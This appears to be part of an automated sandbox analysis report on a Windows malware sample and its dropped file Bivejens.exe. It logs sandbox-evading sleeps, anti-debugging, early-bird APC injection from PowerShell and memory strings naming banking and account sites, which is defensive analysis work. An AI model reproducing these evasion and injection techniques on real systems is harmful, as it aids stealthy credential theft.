Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -598594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -594851s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -594749s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -594626s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -594431s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -594250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -594141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -594016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -593891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -593782s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -593657s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\TjoY7n65om.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Code function: 0_2_004065C7 FindFirstFileW,FindClose,	0_2_004065C7
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405996
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_00402868 LdrInitializeThunk,FindFirstFileW,	5_2_00402868
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_004065C7 FindFirstFileW,FindClose,	5_2_004065C7
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindNextFileW,FindClose,LdrInitializeThunk,LdrInitializeThunk,	5_2_00405996

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594851	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594626	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594431	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 593891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 593782	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 593657	Jump to behavior

Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2597746067.000000000268E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2597746067.0000000002638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f

Source: C:\Users\user\Desktop\TjoY7n65om.exe	API call chain: ExitProcess graph end node			graph_0-3727
Source: C:\Users\user\Desktop\TjoY7n65om.exe	API call chain: ExitProcess graph end node			graph_0-3735

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe

Code function: 5_2_00401941 LdrInitializeThunk,

5_2_00401941

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Bivejens.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Bivejens.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Users\user\AppData\Local\Temp\Bivejens.exe base: 16F0000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Users\user\AppData\Local\Temp\Bivejens.exe "C:\Users\user\AppData\Local\Temp\Bivejens.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
